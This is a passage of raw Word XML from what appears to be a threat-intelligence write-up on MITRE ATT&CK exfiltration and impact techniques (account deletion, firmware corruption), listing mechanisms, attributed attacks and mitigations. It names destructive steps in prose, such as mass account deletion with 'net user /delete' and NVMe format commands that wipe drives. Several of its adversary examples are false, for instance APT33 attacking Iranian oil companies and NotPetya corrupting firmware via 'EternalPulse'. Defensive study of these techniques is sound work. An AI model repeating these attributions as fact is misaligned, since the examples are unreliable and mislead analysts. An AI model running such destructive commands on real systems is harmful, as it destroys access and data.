        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823D78">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WebSocket Tunneling for Real-Time Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mechanism: Attackers use WebSocket protocols (e.g., wss://) to stream stolen data in real time. The bidirectional connection mimics chat apps or stock tickers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adversary Example: APT37 exfiltrated documents via WebSocket tunnels to slack-webhooks.com, disguising traffic as Slack notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRPr="00550119" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Decrypt and inspect TLS traffic (SSL/TLS interception).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00550119" w:rsidRDefault="00550119" w:rsidP="00823D78">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550119">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Block WebSocket connections to unknown domains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74512" w:rsidRDefault="00A74512" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00694159" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A74512" w:rsidRPr="00A74512" w:rsidRDefault="00A74512" w:rsidP="00A74512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00823D78" w:rsidRPr="00823D78" w:rsidRDefault="00264887" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F34F9E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
      <w:r w:rsidR="00316B94">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00823D78" w:rsidRPr="00823D78">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0040): Disrupting Operations and Destroying Data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRDefault="00823D78" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: The Impact tactic covers techniques adversaries use to disrupt availability, destroy data, or manipulate systems for sabotage. This includes deleting accounts, corrupting firmware, and forcing shutdowns to inflict operational damage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>1) Technique: Account Access Removal (T1531)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition: </w:t>
      </w:r>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversaries delete or disable user/administrator accounts to lock victims out of systems, preventing recovery or incident response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mass Account Deletion via PowerShell Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Attackers use PowerShell commands like Remove-LocalUser or net user /delete to wipe accounts. Cloud accounts (e.g., Azure AD) are removed via APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>LAPSUS$ deleted admin accounts at Okta and Microsoft, disrupting authentication services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Permanent loss of access if backups don’t restore account databases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Group Policy Modification to Disable Logins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries edit GPOs to enforce Deny logon rights for all users or admins (gpedit.msc → Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>APT33 disabled domain admin accounts in Iranian oil companies to halt operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Enable account recovery workflows (e.g., break-glass admin accounts).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Monitor for Remove-LocalUser or net user commands in logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>2) Technique: Firmware Corruption (T1495)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries overwrite device firmware (e.g., BIOS/UEFI, SSD controllers) to render hardware unusable ("bricking"). This bypasses OS-level recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00155378" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155378">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>UEFI Rootkit Deployment with Malicious Updates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Attackers flash malicious firmware via compromised update tools (e.g., Lenovo System Update) or SPI flash programmers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>LoJax (APT28) overwrote UEFI firmware to maintain persistence and corrupt bootloaders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00155378" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155378">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSD/NVMe Firmware Wiping with Vendor Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Abuse vendor utilities (e.g., Samsung Magician) to execute Format NVM commands, permanently erasing storage controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>NotPetya used EternalPulse to corrupt firmware in Ukrainian banks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
